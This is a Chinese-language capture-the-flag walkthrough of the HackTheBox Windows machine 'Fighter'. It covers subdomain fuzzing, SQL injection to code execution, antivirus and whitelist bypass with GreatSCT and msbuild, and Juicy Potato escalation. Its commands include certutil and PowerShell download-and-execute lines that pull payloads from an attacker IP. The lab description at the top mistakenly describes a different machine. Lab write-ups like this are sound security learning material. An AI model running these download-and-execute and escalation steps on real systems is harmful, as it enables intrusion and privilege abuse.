HackTheBox-windows-Fighter-Walkthrough

靶机地址：https://www.hackthebox.eu/home/machines/profile/137
靶机难度：中级（无/10）
靶机发布日期：2018年10月25日
靶机描述：
Rabbit is a fairly realistic machine which provides excellent practice for client-side attacks and web app enumeration. The large potential attack surface of the machine and lack of feedback for created payloads increases the difficulty of the machine.
作者：大余
时间：2020-03-22
请注意：对于所有这些计算机，我是通过平台授权允许情况进行渗透的。我将使用Kali Linux作为解决该HTB的攻击者机器。这里使用的技术仅用于学习教育目的，如果列出的技术用于其他任何目标，我概不负责。

一、信息收集

可以看到靶机的IP是10.10.10.72…

Nmap发现80端口开放着，版本IIS/8.5，可以知道Windows Server 2012 R2上运行（可以goole搜索即可知道）

这是拳皇…
这里找到了域名…streetfighterclub.htb，还让我们去找到下一个链接…先添加到hosts中
利用gobuster和dirb爆破域名…没发现任何信息…

命令：wfuzz -w /usr/share/amass/wordlists/subdomains-top1mil-5000.txt -u streetfighterclub.htb -H "Host: FUZZ.streetfighterclub.htb" --hw 717
这里利用wfuzz进行域名爆破，发现了底下有members子域名，一般信息收集真实域名如果发现不了，去尝试发现子域名，会有意外收获…
这里把members.streetfighterclub.htb加入到hots中即可…继续爆破…

命令：gobuster dir -w /usr/share/dirb/wordlists/common.txt -u http://members.streetfighterclub.htb -o dayu.log
可以看到子域名爆破发现了有用的目录…old
这里前面知道运行的是IIS，存在asp文件，继续针对进行爆破…

命令：gobuster dir -w /usr/share/dirb/wordlists/common.txt -u http://members.streetfighterclub.htb/old -X .asp
可以看到发现了login.asp…

可以看到这是一个登陆界面…测试了默认密码都无法登陆，这边进行sql注入分析…
这里利用burpsuit进行分析…

经过初步分析，两个type中administrator和User的类型都是一致的，都是2017字节…这里我就随意用一个分析即可…

这里已经测试过了admin和passwd的注入，都无法注入…这里尝试在type发现了500的错误…这里有错误肯定有正确，找到反对注入点即可

可以看到存在注入点，符号加英文是返回302，英文加任何都是500回复…利用sql注入方法开始注入…

仔细可以看到，SQL注入回复了一封email…

找到了个电子邮件…
这里知道注入点可以找到对方的内容信息…那只要提交个shell即可提权？？？
这里经过了大神的文章，参考链接利用sql获得REC…

这里命令需要的私聊我，弄了几个小时…收获非常多…注入
可以看到成功获得低权用户…反向外壳…

打了挺多补丁的…159个…（牛逼）
在此用户上，不能查看user信息…

可以看到防火墙已经开放了80端口…
尝试用了MSF的EXE提权，和shell提权都没办法，防火墙阻碍了…
这边需要绕过防火墙，或者加入白名单等方式，进行提权了…

方法1：

GreatSCT利用这个工具进行防病毒…这里需要下载steup（在文件中带了，./setup -c即可下载相关组件）

命令：./GreatSCT.py
运行后，开始利用工具，里面很多exploit都是可以绕过各种防火墙的shell…这里生成即可…use Bypass选择绕过的意思…
这里不懂得可以看我前面截图得help…

list选择payload…GO

可以看到，这里选择https得payload…（q返回上一层）

选择刚利用得payload即可…

这里填写反向shell回来指向本地IP即可…然后generate执行产生有效载荷…

执行完generate后，直接输入dayushell即可…（名称）
然后会生成shellcode…这里直接利用dayushell.xml即可…

命令：certutil.exe -urlcache -split -f http://10.10.14.11/dayushell.xml dayushell.xml
本地开启80服务上传文件，成功利用windows上带得certutil上传了shellcode…

这里利用MSF来进行监听…选择https…端口选择和shellcode一致即可…
这里要利用windows自带得msbuild.exe进行白名单方式绕过执行.xml得shellcode文件…

msbuild.exe存放的路径搜索都能知道…
开始提权…GO

可以看到，是可以提权的，但是利用MSF也无法获取反向shell的数据包…
不知道是exploit错了，还是GreatSCT有生成的包有问题…这里按照思路尝试了挺久，没成功，应该是exp有问题…大家看到这里的可以尝试下…

方法2：

https://github.com/ohpe/juicy-potato
利用土豆进行绕过防火墙提权…

下载到本地…

上传即可…

随意拿一个文件执行，可以看到需要得条件挺多，条件允许得情况才可提权…开始把

这里需要一个shell…利用nishang即可…

命令：cmd /c "echo powershell iex(new-object net.webclient).downloadstring(''http://10.10.14.11/dayu'') >shell.bat"
写一个Bat…利用powershell上传shellcode…现在只差CLSID了…

到这里找即可…

前面Nmap和低权systeminfo都可以看出系统信息…选择2012即可…

可以看到随意利用CLSID不对…这里一个一个试即可…版本所有得CLSID都在里面…不多

命令：C:\windows\system32\spool\drivers\color\JuicyPotato.exe -p shell.bat -t * -l 1337 -c '{8F5DF053-3013-4dd8-B5F4-88214E81C0CF}'
这里出了点问题，前面CLSID成功了，但是80却没上传dayu得shellcode…检查发现多打了两个点…看图即可…
可以看到成功提权…这里通过CLSID方式绕过了防火墙防病毒模块…

三、逆向工程

user可以正常读取…这里查看root信息还有个小坑…root
可以看到还存在着一个checkdll.dll文件…可以利用它解析root.exe成txt文件，然后下载即可…

可以看到执行root.exe需要passwd…这里开始解析，下载下来…

这里要逆向去分析root.exe了…GO
这边需要使用到IDA进行…装了半天还是没装上，有人kali装了IDA的教我下…但是我装在了电脑上…在windows10进行分析一样…
这里记得checkdll.dll 也要下载，这两个是连带的…不然无法逆向…

可以看到成功打开了，这已经不是我第一次玩逆向了…开始
可以看到root.exe是基于checkdll.dll执行的，如果想分析打开root.exe只要去逆向解析checkdll即可…

这里shift+F12可以弹出string window 可以查看详细的插件汇编内容…

这里需要知道程序对变量aFmFeholH的字符是多少，点击check+8跳转到Fm`fEhOl}h去查看下…

这里可以看到Fm`fEhOl}h该函数对于aFmFeholH的xor每个字符是9…
这里就好办了，直接写个简单python跑下即可…

for i in "Fm`fEhOl}h":print(chr(ord(i) ^ ord('\x09')),end='')print()

简单的命令跑下即可…得到了密码OdioLaFeta…

可以看到成功获得root信息…

从开始的信息收集域名爆破，到burpsuit分析sql注入点，到绕过防火墙提权，到利用IDA逆向解析.exe程序…
学到挺多，做的过程很头疼，做完的感觉思路很清晰…加油！！！
这里应该还有很多绕开WAF、防火墙、防病毒模块等大神写的工具，或者方法，慢慢总结！

kali还是没装成IDA…估计是环境问题…
GreatSCT提权还是有问题…
希望会以上这两个的，私聊告知，感谢！

由于我们已经成功得到root权限查看user.txt和root.txt，因此完成了较困难靶机，希望你们喜欢这台机器，请继续关注大余后期会有更多具有挑战性的机器，一起练习学习。

如果你有其他的方法，欢迎留言。要是有写错了的地方，请你一定要告诉我。要是你觉得这篇博客写的还不错，欢迎分享给身边的人。

No.72-HackTheBox-windows-Fighter-Walkthrough渗透学习相关推荐

内网渗透学习-Windows信息收集
内网渗透学习-Windows信息收集本章内容主要介绍在获取网站服务器webshell后,怎样对Windows主机进行信息收集,对其网络环境进行分析和利用,主要是一个思路整理,在后续的章节中会整理更详 ...
渗透学习-SQL注入篇-基础知识的学习（持续更新中）
提示:仅供进行学习使用,请勿做出非法的行为.如若由任何违法行为,将依据法律法规进行严惩!!! 文章目录前言一.SQL注入产生的原因二.手工注入大致过程 1.判断注入点: 2.猜解列名 3.猜解能 ...
K8S云原生环境渗透学习
转载至K8S云原生环境渗透学习 - 先知社区 K8S云原生环境渗透学习前言 Kubernetes,简称k8s,是当前主流的容器调度平台,被称为云原生时代的操作系统.在实际项目也经常发 ...
红蓝对抗之Windows内网渗透
无论是渗透测试,还是红蓝对抗,目的都是暴露风险,促进提升安全水平.企业往往在外网布置重兵把守,而内网防护相对来说千疮百孔,所以渗透高手往往通过攻击员工电脑.外网服务.职场WiFi等方式进入内网,然后发 ...
Windows网络服务渗透测试实战-跨网段攻击
一.实验项目名称 Windows网络服务渗透测试实战-跨网段攻击二.实验目的及要求掌握对跨网段攻击的方法. 熟悉Metasploit终端的使用方法. 熟悉通过meterpreter进行后渗透操作 ...
内网渗透-Windows内网渗透
内网渗透-Windows内网渗透文章目录内网渗透-Windows内网渗透前言一.信息收集 1.1.SPN 1.2.端口连接 1.3.配置文件 1.4.用户信息 1.6.会话收集 1.7.凭据收 ...
Windows网络服务渗透测试实战MS17-010漏洞复现
一.实验项目名称 Windows网络服务渗透测试实战MS17-010漏洞复现二.实验目的及要求熟悉Metasploit终端的使用方法: 掌握对MS17-010漏洞攻击的方法. 三.复现步骤(附加文 ...
Web安全渗透学习-环境搭建
Web安全渗透-学习笔记-第一阶段环境准备 OWASP靶机下载 OWASP下载教程 Kali虚拟机安装虚拟机网络环境设置虚拟机无法上网的情况小得环境准备首先我只是一名纯小白,特别纯那种,目 ...
web渗透学习路线图
前言首先,你要高度热爱网络安全这个领域,你要问问自己是否是真的热爱这个行业,自己是否会因为各种了理由半途而废,放弃掉你的热爱.衡量热爱的方法特别特别地简单:看看自己主动花了多少时间在哪些事情方面,重 ...
分享Silverlight/WPF/Windows Phone一周学习导读(10月1日-10月15日)
分享Silverlight/WPF/Windows Phone一周学习导读(10月1日-10月15日) 本周Silverlight学习资源更新: [Silverlight入门系列]ListboxIte ...

No.72-HackTheBox-windows-Fighter-Walkthrough渗透学习